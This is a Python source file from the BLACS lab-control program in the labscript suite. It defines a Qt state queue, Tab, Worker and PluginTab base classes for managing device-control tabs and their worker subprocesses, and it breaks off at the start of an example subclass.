tab_base_classes.py
##################################################################### # # # /tab_base_classes.py # # # # Copyright 2013, Monash University # # # # This file is part of the program BLACS, in the labscript suite # # (see http://labscriptsuite.org), and is licensed under the # # Simplified BSD License. See the license.txt file in the root of # # the project for the full license. # # # ##################################################################### from zprocess import Process, Interruptor, Interrupted import time import sys import threading import traceback import logging import warnings import queue import pickle from html import escape import os from types import GeneratorType from bisect import insort from qtutils.qt.QtCore import * from qtutils.qt.QtGui import * from qtutils.qt.QtWidgets import * from qtutils import * from labscript_utils.qtwidgets.outputbox import OutputBox import qtutils.icons from labscript_utils.qtwidgets.elide_label import elide_label from labscript_utils.ls_zprocess import ProcessTree, RemoteProcessClient from labscript_utils.shared_drive import path_to_local from blacs import BLACS_DIR process_tree = ProcessTree.instance() from labscript_utils import dedent class Counter(object): """A class with a single method that returns a different integer each time it's called.""" def __init__(self): self.i = 0 def get(self): self.i += 1 return self.i MODE_MANUAL = 1 MODE_TRANSITION_TO_BUFFERED = 2 MODE_TRANSITION_TO_MANUAL = 4 MODE_BUFFERED = 8 class StateQueue(object): # NOTE: # # It is theoretically possible to remove the dependency on the Qt Mainloop (remove inmain decorators and fnuction calls) # by introducing a local lock object instead. However, be aware that right now, the Qt inmain lock is preventing the # statemachine loop (Tab.mainloop) from getting any states uot of the queue until after the entire tab is initialised # and the Qt mainloop starts. # # This is particularly important because we exploit this behaviour to make sure that Tab._initialise_worker is placed at the # start of the StateQueue, and so the Tab.mainloop method is guaranteed to get this initialisation method as the first state # regardless of whether the mainloop is started before the state is inserted (the state should always be inserted as part of # the call to Tab.create_worker, in DeviceTab.initialise_workers in DeviceTab.__init__ ) # def __init__(self,device_name): self.logger = logging.getLogger('BLACS.%s.state_queue'%(device_name)) self.logging_enabled = False if self.logging_enabled: self.logger.debug("started") self.list_of_states = [] self._last_requested_state = None # A queue that blocks the get(requested_state) method until an entry in the queue has a state that matches the requested_state self.get_blocking_queue = queue.Queue() @property @inmain_decorator(True) # This is always done in main so that we avoid a race condition between the get method and # the put method accessing this property def last_requested_state(self): return self._last_requested_state @last_requested_state.setter @inmain_decorator(True) def last_requested_state(self, value): self._last_requested_state = value def log_current_states(self): if self.logging_enabled: self.logger.debug('Current items in the state queue: %s'%str(self.list_of_states)) # this should only happen in the main thread, as my implementation is not thread safe! @inmain_decorator(True) def put(self, allowed_states, queue_state_indefinitely, delete_stale_states, data, priority=0): """Add a state to the queue. 
Lower number for priority indicates the state will be executed before any states with higher numbers for their priority""" # State data starts with priority, and then with a unique id that monotonically # increases. This way, sorting the queue will sort first by priority and then by # order added. state_data = [priority, get_unique_id(), allowed_states, queue_state_indefinitely, delete_stale_states,data] # Insert the task into the queue, retaining sort order first by priority and then by order added: insort(self.list_of_states, state_data) # if this state is one the get command is waiting for, notify it! if self.last_requested_state is not None and allowed_states&self.last_requested_state: self.get_blocking_queue.put('new item') if self.logging_enabled: if not isinstance(data[0],str): self.logger.debug('New state queued up. Allowed modes: %d, queue state indefinitely: %s, delete stale states: %s, function: %s'%(allowed_states,str(queue_state_indefinitely),str(delete_stale_states),data[0].__name__)) self.log_current_states() # this should only happen in the main thread, as my implementation is not thread safe! @inmain_decorator(True) def check_for_next_item(self,state): # We reset the queue here, as we are about to traverse the tree, which contains any new items that # are described in messages in this queue, so let's not keep those messages around anymore. # Put another way, we want to block until a new item is added, if we don't find an item in this function # So it's best if the queue is empty now! if self.logging_enabled: self.logger.debug('Re-initialsing self._get_blocking_queue') self.get_blocking_queue = queue.Queue() # traverse the list delete_index_list = [] success = False for i,item in enumerate(self.list_of_states): priority, unique_id, allowed_states, queue_state_indefinitely, delete_stale_states, data = item if self.logging_enabled: self.logger.debug('iterating over states in queue') if allowed_states&state: # We have found one! Remove it from the list delete_index_list.append(i) if self.logging_enabled: self.logger.debug('requested state found in queue') # If we are to delete stale states, see if the next state is the same statefunction. # If it is, use that one, or whichever is the latest entry without encountering a different statefunction, # and delete the rest if delete_stale_states: state_function = data[0] i+=1 while i < len(self.list_of_states) and state_function == self.list_of_states[i][5][0]: if self.logging_enabled: self.logger.debug('requesting deletion of stale state') priority, unique_id, allowed_states, queue_state_indefinitely, delete_stale_states, data = self.list_of_states[i] delete_index_list.append(i) i+=1 success = True break elif not queue_state_indefinitely: if self.logging_enabled: self.logger.debug('state should not be queued indefinitely') delete_index_list.append(i) # do this in reverse order so that the first delete operation doesn't mess up the indices of subsequent ones for index in reversed(sorted(delete_index_list)): if self.logging_enabled: self.logger.debug('deleting state') del self.list_of_states[index] if not success: data = None return success,data # this method should not be called in the main thread, because it will block until something is found... # Please, only have one thread ever accessing this...I have no idea how it will behave if multiple threads are trying to get # items from the queue... # # This method will block until a item found in the queue is found to be allowed during the specified 'state'. 
def get(self,state): if self.last_requested_state: raise Exception('You have multiple threads trying to get from this queue at the same time. I won\'t allow it!') self.last_requested_state = state while True: if self.logging_enabled: self.logger.debug('requesting next item in queue with mode %d'%state) inmain(self.log_current_states) status,data = self.check_for_next_item(state) if not status: # we didn't find anything useful, so we'll wait until a useful state is added! self.get_blocking_queue.get() else: self.last_requested_state = None return data # A counter for uniqely numbering timeouts and numbering queued states monotinically, # such that sort order coresponds to the order the state was added to the queue: get_unique_id = Counter().get def define_state(allowed_modes,queue_state_indefinitely,delete_stale_states=False): def wrap(function): unescaped_name = function.__name__ escapedname = '_' + function.__name__ if allowed_modes < 1 or allowed_modes > 15: raise RuntimeError('Function %s has been set to run in unknown states. Please make sure allowed states is one or more of MODE_MANUAL,'%unescaped_name+ 'MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL and MODE_BUFFERED (or-ed together using the | symbol, eg MODE_MANUAL|MODE_BUFFERED') def f(self,*args,**kwargs): function.__name__ = escapedname #setattr(self,escapedname,function) self.event_queue.put(allowed_modes,queue_state_indefinitely,delete_stale_states,[function,[args,kwargs]]) f.__name__ = unescaped_name f._allowed_modes = allowed_modes return f return wrap class Tab(object): ICON_OK = ':/qtutils/fugue/tick' ICON_BUSY = ':/qtutils/fugue/hourglass' ICON_ERROR = ':/qtutils/fugue/exclamation' ICON_FATAL_ERROR = ':/qtutils/fugue/exclamation-red' def __init__(self,notebook,settings,restart=False): # Store important parameters self.notebook = notebook self.settings = settings self._device_name = self.settings["device_name"] # Setup logging self.logger = logging.getLogger('BLACS.%s'%(self.device_name)) self.logger.debug('Started') # Setup the timer for updating that tab text label when the tab is not # actively part of a notebook self._tab_icon_and_colour_timer = QTimer() self._tab_icon_and_colour_timer.timeout.connect(self.set_tab_icon_and_colour) self._tab_icon = self.ICON_OK self._tab_text_colour = 'black' # Create instance variables self._not_responding_error_message = '' self._error = '' self._state = '' self._time_of_last_state_change = time.time() self.not_responding_for = 0 self.hide_not_responding_error_until = 0 self._timeouts = set() self._timeout_ids = {} self._force_full_buffered_reprogram = True self.event_queue = StateQueue(self.device_name) self.workers = {} self._supports_smart_programming = False self._restart_receiver = [] self.shutdown_workers_complete = False self.remote_process_client = self._get_remote_configuration() self.BLACS_connection = self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection # Load the UI self._ui = UiLoader().load(os.path.join(BLACS_DIR, 'tab_frame.ui')) self._layout = self._ui.device_layout self._device_widget = self._ui.device_controls self._changed_widget = self._ui.changed_widget self._changed_layout = self._ui.changed_layout self._changed_widget.hide() conn_str = self.BLACS_connection if self.remote_process_client is not None: conn_str += " via %s:%d" % (self.remote_process_client.host, self.remote_process_client.port) self._ui.device_name.setText( "<b>%s</b> [conn: %s]" % (str(self.device_name), conn_str) ) elide_label(self._ui.device_name, 
self._ui.horizontalLayout, Qt.ElideRight) elide_label(self._ui.state_label, self._ui.state_label_layout, Qt.ElideRight) # Insert an OutputBox into the splitter, initially hidden: self._output_box = OutputBox(self._ui.splitter) self._ui.splitter.setCollapsible(self._ui.splitter.count() - 2, True) self._output_box.output_textedit.hide() # connect signals self._ui.button_clear_smart_programming.clicked.connect(self.on_force_full_buffered_reprogram) self._ui.button_clear_smart_programming.setEnabled(False) self.force_full_buffered_reprogram = True self._ui.button_show_terminal.toggled.connect(self.set_terminal_visible) self._ui.button_close.clicked.connect(self.hide_error) self._ui.button_restart.clicked.connect(self.restart) self._update_error_and_tab_icon() self.supports_smart_programming(False) # Restore settings: self.restore_builtin_save_data(self.settings.get('saved_data', {})) # This should be done beofre the main_loop starts or else there is a race condition as to whether the # self._mode variable is even defined! # However it must be done after the UI is created! self.mode = MODE_MANUAL self.state = 'idle' # Setup the not responding timeout self._timeout = QTimer() self._timeout.timeout.connect(self.check_time) self._timeout.start(1000) # Launch the mainloop self._mainloop_thread = threading.Thread(target = self.mainloop) self._mainloop_thread.daemon = True self._mainloop_thread.start() # Add the tab to the notebook self.notebook.addTab(self._ui,self.device_name) self._ui.show() def _get_remote_configuration(self): # Create and return zprocess remote process client, if the device is configured # as a remote device, else None: PRIMARY_BLACS = '__PrimaryBLACS' table = self.settings['connection_table'] properties = table.find_by_name(self.device_name).properties if properties.get('gui', PRIMARY_BLACS) != PRIMARY_BLACS: msg = "Remote BLACS GUIs not yet supported by BLACS" raise NotImplementedError(msg) remote_server_name = properties.get('worker', PRIMARY_BLACS) if remote_server_name != PRIMARY_BLACS: remote_server_device = table.find_by_name(remote_server_name) if remote_server_device.parent.name != PRIMARY_BLACS: msg = "Multi-hop remote workers not yet supported by BLACS" raise NotImplementedError(msg) remote_host, remote_port = remote_server_device.parent_port.split(':') remote_port = int(remote_port) return RemoteProcessClient(remote_host, remote_port) return None def get_builtin_save_data(self): """Get builtin settings to be restored like whether the terminal is visible. Not to be overridden.""" return {'_terminal_visible': self._ui.button_show_terminal.isChecked(), '_splitter_sizes': self._ui.splitter.sizes()} def get_all_save_data(self): save_data = self.get_builtin_save_data() if hasattr(self, 'get_save_data'): tab_save_data = self.get_save_data() if isinstance(tab_save_data, dict): save_data.update(tab_save_data) else: self.logger.warning('Incorrect format for tab save data from the get_save_data() method. Data should be a dict. Data was: %s'%tab_save_data) return save_data def restore_builtin_save_data(self, data): """Restore builtin settings to be restored like whether the terminal is visible. 
Not to be overridden.""" self.set_terminal_visible(data.get('_terminal_visible', False)) if '_splitter_sizes' in data: self._ui.splitter.setSizes(data['_splitter_sizes']) def update_from_settings(self, settings): self.restore_builtin_save_data(settings['saved_data']) def supports_smart_programming(self,support): self._supports_smart_programming = bool(support) if self._supports_smart_programming: self._ui.button_clear_smart_programming.show() else: self._ui.button_clear_smart_programming.hide() def on_force_full_buffered_reprogram(self): self.force_full_buffered_reprogram = True @property def force_full_buffered_reprogram(self): return self._force_full_buffered_reprogram @force_full_buffered_reprogram.setter def force_full_buffered_reprogram(self,value): self._force_full_buffered_reprogram = bool(value) self._ui.button_clear_smart_programming.setEnabled(not bool(value)) @property @inmain_decorator(True) def error_message(self): return self._error @error_message.setter @inmain_decorator(True) def error_message(self,message): #print message #print self._error if message != self._error: self._error = message self._update_error_and_tab_icon() @inmain_decorator(True) def _update_error_and_tab_icon(self): """Udate and show the error message for the tab, and update the icon and text colour on the tab""" prefix = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:"MS Shell Dlg 2"; font-size:7.8pt; font-weight:400; font-style:normal;">' suffix = '</body></html>' #print threading.current_thread().name self._ui.error_message.setHtml(prefix+self._not_responding_error_message+self._error+suffix) if self._error or self._not_responding_error_message: self._ui.notresponding.show() self._tab_text_colour = 'red' if self.error_message: if self.state == 'fatal error': self._tab_icon = self.ICON_FATAL_ERROR else: self._tab_icon = self.ICON_ERROR else: self._ui.notresponding.hide() self._tab_text_colour = 'black' if self.state == 'idle': self._tab_icon = self.ICON_OK else: self._tab_icon = self.ICON_BUSY self.set_tab_icon_and_colour() @inmain_decorator(True) def set_tab_icon_and_colour(self): """Set the tab icon and the colour of its text to the values of self._tab_icon and self._tab_text_colour respectively""" if self._ui.parentWidget() is None: return self.notebook = self._ui.parentWidget().parentWidget() if self.notebook is not None: currentpage = self.notebook.indexOf(self._ui) if currentpage == -1: # shutting down: return icon = QIcon(self._tab_icon) self.notebook.tabBar().setTabIcon(currentpage, icon) self.notebook.tabBar().setTabTextColor(currentpage, QColor(self._tab_text_colour)) def get_tab_layout(self): return self._layout @property def device_name(self): return self._device_name # sets the mode, switches between MANUAL, BUFFERED, TRANSITION_TO_BUFFERED and TRANSITION_TO_STATIC @property def mode(self): return self._mode @mode.setter def mode(self,mode): self._mode = mode self._update_state_label() @property def state(self): return self._state @state.setter def state(self,state): self._state = state self._time_of_last_state_change = time.time() self._update_state_label() self._update_error_and_tab_icon() @inmain_decorator(True) def _update_state_label(self): if self.mode == 1: mode = 'Manual' elif self.mode == 2: mode = 'Transitioning to buffered' elif self.mode == 4: mode = 'Transitioning to manual' elif 
self.mode == 8: mode = 'Buffered' else: raise RuntimeError('self.mode for device %s is invalid. It must be one of MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL or MODE_BUFFERED'%(self.device_name)) self._ui.state_label.setText('<b>%s mode</b> - State: %s'%(mode,self.state)) # Todo: Update icon in tab def create_worker(self,name,WorkerClass,workerargs=None): """Set up a worker process. WorkerClass can either be a subclass of Worker, or a string containing a fully qualified import path to a worker. The latter is useful if the worker class is in a separate file with global imports or other import-time behaviour that is undesirable to have run in the main process, for example if the imports may not be available to the main process (as may be the case once remote worker processes are implemented and the worker may be on a separate computer). The worker process will not be started immediately, it will be started once the state machine mainloop begins running. This way errors in startup will be handled using the normal state machine machinery.""" if workerargs is None: workerargs = {} # Add all connection table properties, if they were not already specified in # workerargs: conntable = self.settings['connection_table'] for key, value in conntable.find_by_name(self.device_name).properties.items(): workerargs.setdefault(key, value) workerargs['is_remote'] = self.remote_process_client is not None if name in self.workers: raise Exception('There is already a worker process with name: %s'%name) if name == 'GUI': # This is here so that we can display "(GUI)" in the status bar and have the user confident this is actually happening in the GUI, # not in a worker process named GUI raise Exception('You cannot call a worker process "GUI". Why would you want to? Your worker process cannot interact with the BLACS GUI directly, so you are just trying to confuse yourself!') if isinstance(WorkerClass, type): worker = WorkerClass( process_tree, output_redirection_port=self._output_box.port, remote_process_client=self.remote_process_client, startup_timeout=30 ) elif isinstance(WorkerClass, str): # If we were passed a string for the WorkerClass, it is an import path # for where the Worker class can be found. Pass it to zprocess.Process, # which will do the import in the subprocess only. worker = Process( process_tree, output_redirection_port=self._output_box.port, remote_process_client=self.remote_process_client, startup_timeout=30, subclass_fullname=WorkerClass ) else: raise TypeError(WorkerClass) self.workers[name] = (worker,None,None) self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,[Tab._initialise_worker,[(name, workerargs),{}]], priority=-1) def _initialise_worker(self, worker_name, workerargs): yield (self.queue_work(worker_name, 'init', worker_name, self.device_name, workerargs)) if self.error_message: raise Exception('Device failed to initialise') @define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True) def _timeout_add(self,delay,execute_timeout): QTimer.singleShot(delay,execute_timeout) def statemachine_timeout_add(self,delay,statefunction,*args,**kwargs): # Add the timeout to our set of registered timeouts. 
Timeouts # can thus be removed by the user at ay time by calling # self.timeouts.remove(function) self._timeouts.add(statefunction) # Here's a function which executes the timeout once, then queues # itself up again after a delay: def execute_timeout(): # queue up the state function, but only if it hasn't been # removed from self.timeouts: if statefunction in self._timeouts and self._timeout_ids[statefunction] == unique_id: # Only queue up the state if we are in an allowed mode if statefunction._allowed_modes&self.mode: statefunction(*args, **kwargs) # queue up another call to this function (execute_timeout) # after the delay time: self._timeout_add(delay,execute_timeout) # Store a unique ID for this timeout so that we don't confuse # other timeouts for this one when checking to see that this # timeout hasn't been removed: unique_id = get_unique_id() self._timeout_ids[statefunction] = unique_id # queue the first run: #QTimer.singleShot(delay,execute_timeout) execute_timeout() # Returns True if the timeout was removed def statemachine_timeout_remove(self,statefunction): if statefunction in self._timeouts: self._timeouts.remove(statefunction) return True return False # returns True if at least one timeout was removed, else returns False def statemachine_timeout_remove_all(self): # As a consistency check, we overwrite self._timeouts to an empty set always # This must be done after the check to see if it is empty (if self._timeouts) so do not refactor this code! if self._timeouts: self._timeouts = set() return True else: self._timeouts = set() return False @define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True) def shutdown_workers(self): """Ask all workers to shutdown""" for worker_name in self.workers: yield(self.queue_work(worker_name, 'shutdown')) self.shutdown_workers_complete = True def close_tab(self, finalise=True): """Close the tab, terminate subprocesses and join the mainloop thread. If finalise=False, then do not terminate subprocesses or join the mainloop. 
In this case, callers must manually call finalise_close_tab() to perform these potentially blocking operations""" self.logger.info('close_tab called') self._timeout.stop() for worker, to_worker, from_worker in self.workers.values(): # If the worker is still starting up, interrupt any blocking operations: worker.interrupt_startup() # Interrupt the read and write queues in case the mainloop is blocking on # sending or receiving from them: if to_worker is not None: to_worker.interrupt() from_worker.interrupt() # In case the mainloop is blocking on the event queue, post a message to that # queue telling it to quit: if self._mainloop_thread.is_alive(): self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,['_quit',None],priority=-1) self.notebook = self._ui.parentWidget().parentWidget() currentpage = None if self.notebook: #currentpage = self.notebook.get_current_page() currentpage = self.notebook.indexOf(self._ui) self.notebook.removeTab(currentpage) temp_widget = QLabel("Waiting for tab mainloop and worker(s) to exit") temp_widget.setAlignment(Qt.AlignCenter) self.notebook.insertTab(currentpage, temp_widget, '[%s]' % self.device_name) self.notebook.tabBar().setTabIcon(currentpage, QIcon(self.ICON_BUSY)) self.notebook.tabBar().setTabTextColor(currentpage, QColor('grey')) self.notebook.setCurrentWidget(temp_widget) if finalise: self.finalise_close_tab(currentpage) return currentpage def finalise_close_tab(self, currentpage): TERMINATE_TIMEOUT = 2 self._mainloop_thread.join(TERMINATE_TIMEOUT) if self._mainloop_thread.is_alive(): self.logger.warning("mainloop thread of %s did not stop", self.device_name) kwargs = {'wait_timeout': TERMINATE_TIMEOUT} # timeout passed to .wait() if self.remote_process_client is not None: # Set up a zprocess.Interruptor to interrupt communication with the remote # process server if the timeout is reached: interruptor = Interruptor() kwargs['get_interruptor'] = interruptor timer = inmain(QTimer) inmain(timer.singleShot, int(TERMINATE_TIMEOUT * 1000), interruptor.set) try: # Delete the workers from the dict as we go, ensuring their __del__ method # will be called. This is important so that the remote process server, if # any, knows we have deleted the object: for name in self.workers.copy(): worker, _, _ = self.workers.pop(name) worker.terminate(**kwargs) except Interrupted: self.logger.warning( "Terminating workers of %s timed out", self.device_name ) return finally: # Shutdown the output box by joining its thread: self._output_box.shutdown() if self.remote_process_client is not None: inmain(timer.stop) def connect_restart_receiver(self,function): if function not in self._restart_receiver: self._restart_receiver.append(function) def disconnect_restart_receiver(self,function): if function in self._restart_receiver: self._restart_receiver.remove(function) def restart(self,*args): # notify all connected receivers: for f in self._restart_receiver: try: f(self.device_name) except Exception: self.logger.exception('Could not notify a connected receiver function') currentpage = self.close_tab(finalise=False) self.logger.info('***RESTART***') self.settings['saved_data'] = self.get_all_save_data() self._restart_thread = inthread(self.continue_restart, currentpage) def continue_restart(self, currentpage): """Called in a thread for the stages of restarting that may be blocking, so as to not block the main thread. 
Calls subsequent GUI operations in the main thread once finished blocking.""" self.finalise_close_tab(currentpage) inmain(self.clean_ui_on_restart) inmain(self.finalise_restart, currentpage) def clean_ui_on_restart(self): # Clean up UI ui = self._ui self._ui = None ui.setParent(None) ui.deleteLater() del ui def finalise_restart(self, currentpage): widget = self.notebook.widget(currentpage) widget.setParent(None) widget.deleteLater() del widget # Note: the following function call will break if the user hasn't # overridden the __init__ function to take these arguments. So # make sure you do that! self.__init__(self.notebook, self.settings,restart=True) # The init method is going to place this device tab at the end of the notebook specified # Let's remove it from there, and place it the poition it used to be! self.notebook = self._ui.parentWidget().parentWidget() self.notebook.removeTab(self.notebook.indexOf(self._ui)) self.notebook.insertTab(currentpage,self._ui,self.device_name) self.notebook.setCurrentWidget(self._ui) # If BLACS is waiting on this tab for something, tell it to abort! # self.BLACS.current_queue.put('abort') def queue_work(self,worker_process,worker_function,*args,**kwargs): return worker_process,worker_function,args,kwargs def set_terminal_visible(self, visible): if visible: self._output_box.output_textedit.show() else: self._output_box.output_textedit.hide() self._ui.button_show_terminal.setChecked(visible) def hide_error(self): # dont show the error again until the not responding time has doubled: self.hide_not_responding_error_until = 2*self.not_responding_for self._ui.notresponding.hide() self.error_message = '' self._tab_text_colour = 'black' self.set_tab_icon_and_colour() def check_time(self): if self.state in ['idle','fatal error']: self.not_responding_for = 0 if self._not_responding_error_message: self._not_responding_error_message = '' self._update_error_and_tab_icon() else: self.not_responding_for = time.time() - self._time_of_last_state_change if self.not_responding_for > 5 + self.hide_not_responding_error_until: self.hide_not_responding_error_for = 0 self._ui.notresponding.show() hours, remainder = divmod(int(self.not_responding_for), 3600) minutes, seconds = divmod(remainder, 60) if hours: s = '%s hours'%hours elif minutes: s = '%s minutes'%minutes else: s = '%s seconds'%seconds self._not_responding_error_message = 'The hardware process has not responded for %s.<br /><br />'%s self._update_error_and_tab_icon() return True def mainloop(self): logger = logging.getLogger('BLACS.%s.mainloop'%(self.settings['device_name'])) logger.debug('Starting') # Store a reference to the state queue and workers, this way if the tab is restarted, we won't ever get access to the new state queue created then event_queue = self.event_queue workers = self.workers try: while True: # Get the next task from the event queue: logger.debug('Waiting for next event') func, data = event_queue.get(self.mode) if func == '_quit': # The user has requested a restart: logger.debug('Received quit signal') break args,kwargs = data logger.debug('Processing event %s' % func.__name__) self.state = '%s (GUI)'%func.__name__ # Run the task with the GUI lock, catching any exceptions: #func = getattr(self,funcname) # run the function in the Qt main thread generator = inmain(func,self,*args,**kwargs) # Do any work that was queued up:(we only talk to the worker if work has been queued up through the yield command) if type(generator) == GeneratorType: # We need to call next recursively, queue up work and send 
the results back until we get a StopIteration exception generator_running = True # get the data from the first yield function worker_process,worker_function,worker_args,worker_kwargs = inmain(generator.__next__) # Continue until we get a StopIteration exception, or the user requests a restart while generator_running: try: logger.debug('Instructing worker %s to do job %s'%(worker_process,worker_function) ) if worker_function == 'init': # Start the worker process before running its init() method: self.state = '%s (%s)'%('Starting worker process', worker_process) worker, _, _ = self.workers[worker_process] to_worker, from_worker = worker.start(*worker_args) self.workers[worker_process] = (worker, to_worker, from_worker) worker_args = () del worker # Do not gold a reference indefinitely worker_arg_list = (worker_function,worker_args,worker_kwargs) # This line is to catch if you try to pass unpickleable objects. try: pickle.dumps(worker_arg_list) except Exception: self.error_message += 'Attempt to pass unserialisable object to child process:' raise # Send the command to the worker to_worker = workers[worker_process][1] from_worker = workers[worker_process][2] to_worker.put(worker_arg_list) self.state = '%s (%s)'%(worker_function,worker_process) # Confirm that the worker got the message: logger.debug('Waiting for worker to acknowledge job request') success, message, results = from_worker.get() if not success: logger.info('Worker reported failure to start job') raise Exception(message) # Wait for and get the results of the work: logger.debug('Worker reported job started, waiting for completion') success,message,results = from_worker.get() if not success: logger.info('Worker reported exception during job') now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime()) self.error_message += ('Exception in worker - %s:<br />' % now + '<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%escape(message).replace(' ','&nbsp;').replace('\n','<br />')) else: logger.debug('Job completed') # Reset the hide_not_responding_error_until, since we have now heard from the child self.hide_not_responding_error_until = 0 # Send the results back to the GUI function logger.debug('returning worker results to function %s' % func.__name__) self.state = '%s (GUI)'%func.__name__ next_yield = inmain(generator.send,results) # If there is another yield command, put the data in the required variables for the next loop iteration if next_yield: worker_process,worker_function,worker_args,worker_kwargs = next_yield except StopIteration: # The generator has finished. Ignore the error, but stop the loop logger.debug('Finalising function') generator_running = False self.state = 'idle' except Interrupted: # User requested a restart logger.debug('Interrupted by tab restart, quitting mainloop') return except Exception: # Some unhandled error happened. 
Inform the user, and give the option to restart message = traceback.format_exc() logger.critical('A fatal exception happened:\n %s'%message) now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime()) self.error_message += ('Fatal exception in main process - %s:<br /> '%now + '<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%escape(message).replace(' ','&nbsp;').replace('\n','<br />')) self.state = 'fatal error' # do this in the main thread inmain(self._ui.button_close.setEnabled,False) logger.info('Exiting') class Worker(Process): def init(self): # To be overridden by subclasses pass def run(self, worker_name, device_name, extraargs): self.worker_name = worker_name self.device_name = device_name from labscript_utils.setup_logging import setup_logging setup_logging('BLACS') log_name = 'BLACS.%s_%s.worker'%(self.device_name,self.worker_name) self.logger = logging.getLogger(log_name) self.logger.debug('Starting') import labscript_utils.excepthook labscript_utils.excepthook.set_logger(self.logger) from labscript_utils.ls_zprocess import ProcessTree process_tree = ProcessTree.instance() import labscript_utils.h5_lock process_tree.zlock_client.set_process_name(log_name) for name, value in extraargs.items(): if hasattr(self, name): msg = """attribute `{}` overwrites an attribute of the Worker base class with the same name. This may cause unexpected behaviour. Consider renaming it.""" warnings.warn(dedent(msg).format(name), RuntimeWarning) else: setattr(self, name, value) self.mainloop() def _transition_to_buffered(self, device_name, h5_file, front_panel_values, fresh): # The h5_file arg was converted to network-agnostic before being sent to us. # Convert it to a local path before calling the subclass's # transition_to_buffered() method h5_file = path_to_local(h5_file) return self.transition_to_buffered( device_name, h5_file, front_panel_values, fresh ) def mainloop(self): while True: # Get the next task to be done: self.logger.debug('Waiting for next job request') funcname, args, kwargs = self.from_parent.get() self.logger.debug('Got job request %s' % funcname) try: # See if we have a method with that name: func = getattr(self,funcname) success = True message = '' except AttributeError: success = False message = traceback.format_exc() self.logger.error('Couldn\'t start job:\n %s'%message) # Report to the parent whether method lookup was successful or not: self.to_parent.put((success,message,None)) if success: # Try to do the requested work: self.logger.debug('Starting job %s'%funcname) try: results = func(*args,**kwargs) success = True message = '' self.logger.debug('Job complete') except Exception: results = None success = False traceback_lines = traceback.format_exception(*sys.exc_info()) del traceback_lines[1] message = ''.join(traceback_lines) self.logger.error('Exception in job:\n%s'%message) # Check if results object is serialisable: try: pickle.dumps(results) except Exception: message = traceback.format_exc() self.logger.error('Job returned unserialisable datatypes, cannot pass them back to parent.\n' + message) message = 'Attempt to pass unserialisable object %s to parent process:\n' % str(results) + message success = False results = None # Report to the parent whether work was successful or not, # and what the results were: self.to_parent.put((success,message,results)) class PluginTab(object): def __init__(self, notebook, settings): # Store important parameters self.notebook = notebook self.settings = settings self._tab_name = self.settings["tab_name"] # Load the UI self._ui = 
UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'plugin_tab_frame.ui')) self._layout = self._ui.device_layout self._ui.device_name.setText("<b>%s</b> [Plugin]" % (str(self.tab_name))) elide_label(self._ui.device_name, self._ui.horizontalLayout, Qt.ElideRight) # Add the tab to the notebook self.notebook.addTab(self._ui, self.tab_name) self._ui.show() # Call the initialise GUI function self.initialise_GUI() self.restore_save_data(self.settings['saved_data'] if 'saved_data' in self.settings else {}) @inmain_decorator(True) def set_tab_icon_and_colour(self): """Set the tab icon and the colour of its text to the values of self._tab_icon and self._tab_text_colour respectively""" if self._ui.parentWidget() is None: return self.notebook = self._ui.parentWidget().parentWidget() if self.notebook is not None: currentpage = self.notebook.indexOf(self._ui) if currentpage == -1: # shutting down: return icon = QIcon(self._tab_icon) self.notebook.tabBar().setTabIcon(currentpage, icon) self.notebook.tabBar().setTabTextColor(currentpage, QColor(self._tab_text_colour)) @property def tab_name(self): return self._tab_name def get_tab_layout(self): return self._layout def close_tab(self, **kwargs): self.notebook = self._ui.parentWidget().parentWidget() currentpage = None if self.notebook: #currentpage = self.notebook.get_current_page() currentpage = self.notebook.indexOf(self._ui) self.notebook.removeTab(currentpage) temp_widget = QWidget() self.notebook.insertTab(currentpage, temp_widget, self.tab_name) self.notebook.setCurrentWidget(temp_widget) return currentpage def initialise_GUI(self): return # This method should be overridden in your plugin class if you want to save any data # This method should return a dictionary, and this dictionary will be passed to the restore_save_data() # method when the tab is initialised def get_save_data(self): return {} def get_all_save_data(self): save_data = self.get_builtin_save_data() if hasattr(self, 'get_save_data'): tab_save_data = self.get_save_data() if isinstance(tab_save_data, dict): save_data.update(tab_save_data) return save_data # This method should be overridden in your plugin class if you want to restore data # (saved by get_save_data()) when the tab is initialised. # You will be passed a dictionary of the form specified by your get_save_data() method # # Note: You must handle the case where the data dictionary is empty (or one or more keys are missing) # This case will occur the first time BLACS is started on a PC, or if the BLACS datastore is destroyed def restore_save_data(self,data): return def update_from_settings(self,settings): self.restore_save_data(settings['saved_data']) def get_builtin_save_data(self): return {} # Example code! Two classes are defined below, which are subclasses # of the ones defined above. They show how to make a Tab class, # and a Worker class, and get the Tab to request work to be done by # the worker in response to GUI events. class MyTab(Tab): def __init__(self,notebook,settings,restart=False): # restart will be true if __init__ was called due to a restart Tab.__init__(self,notebook,settings,restart) # Make sure to call this first in your __init__! 
